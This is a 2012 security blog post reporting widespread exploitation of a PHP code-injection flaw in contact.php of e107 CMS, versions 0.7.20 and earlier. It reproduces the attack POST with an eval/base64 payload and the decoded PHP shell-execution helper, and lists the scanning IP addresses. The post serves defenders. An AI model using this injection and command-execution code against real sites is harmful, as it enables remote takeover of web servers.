The Latest in IT Security

e107 Being Exploited – Vulnerable contact.php Scanned and Attacked

04
Apr
2012

We are seeing an old vulnerability on e107 being widely scanned and exploited. e107 is a free open source content management system (CMS).

More details on the vulnerability are available here:

It was discovered that access control to the [php] bbcode which allows executing PHP code is wrongly implemented in e107. This allows unauthenticated users to execute arbitrary PHP code easily.

Affected versions
Affected is e107 <= 0.7.20
MOPS-2010-111
MOPS-2010-112

What’s it do?

So basically it allows anyone to inject an arbitrary PHP code that gets executed by the contact form. What we are seeing is a large number of scans querying for /contact.php and attemping the following POST:

[send-contactus] => 1
[author_name] => [php]eval(base64_decode(‘ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGh..
0cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKE..
.;die();[/php]

What Happens Next?

If the user is running an outdated/vulnerable version of e107, the following code gets executed:

echo “v0pCr3w<br>”;
echo “sys:”.php_uname().”<br>”;
$cmd=”echo nob0dyCr3w”;
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = “;
if (!empty($cfe)){
if(function_exists(‘exec’)){
@exec($cfe,$res);
$res = join(“\n”,$res);
}
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while([email protected]($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

What this does is it prints “echo nob0dyCr3w”, so they can come back later to compromise the site.

Addresses to Watch

In the last few days we have detected the following IP addresses scanning for this vulnerability (and the number of different sites they attemped):

92 50.28.21.169
80 200.55.136.101
71 193.254.240.175
40 88.198.21.38
29 219.121.0.60
21 69.36.94.214
19 83.222.230.44
18 122.41.36.27
16 211.234.110.168
15 219.166.139.187
14 184.107.41.155
13 175.99.88.1
10 61.177.73.92
9 211.43.205.87
9 176.9.18.253
8 80.249.166.159
7 218.188.39.39
6 91.203.111.18
6 211.233.89.252
6 148.208.211.17
5 91.196.124.204
5 83.228.162.246
5 114.255.58.182
4 78.46.97.21
4 77.93.216.212
4 70.33.254.42
4 202.150.216.211
4 178.18.19.74
4 174.121.238.67
4 109.205.138.43
3 88.198.116.159
3 88.191.131.60
3 81.0.238.89
3 59.139.30.148
3 222.122.161.173
3 218.188.39.51
3 213.175.206.162
3 212.227.119.175
3 210.127.253.75
3 210.109.103.122
3 208.113.241.117
3 206.214.218.186
3 203.71.2.73
3 203.141.152.246
3 188.72.218.187
3 176.31.242.225
3 173.193.110.102
3 130.204.12.33
3 118.163.23.187
2 95.173.183.75
2 77.93.216.208
2 69.175.79.169
2 121.125.32.67
1 94.32.66.141
1 94.102.14.36
1 91.212.74.9
1 84.124.75.46
1 81.91.83.57
1 81.3.4.126
1 78.153.202.220
1 77.223.156.34
1 77.222.40.164
1 58.120.227.170
1 49.50.8.33
1 46.137.104.221
1 222.96.156.164
1 222.231.1.50
1 209.237.150.164
1 202.29.86.7

Leave a reply


Categories

FRIDAY, DECEMBER 13, 2019
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments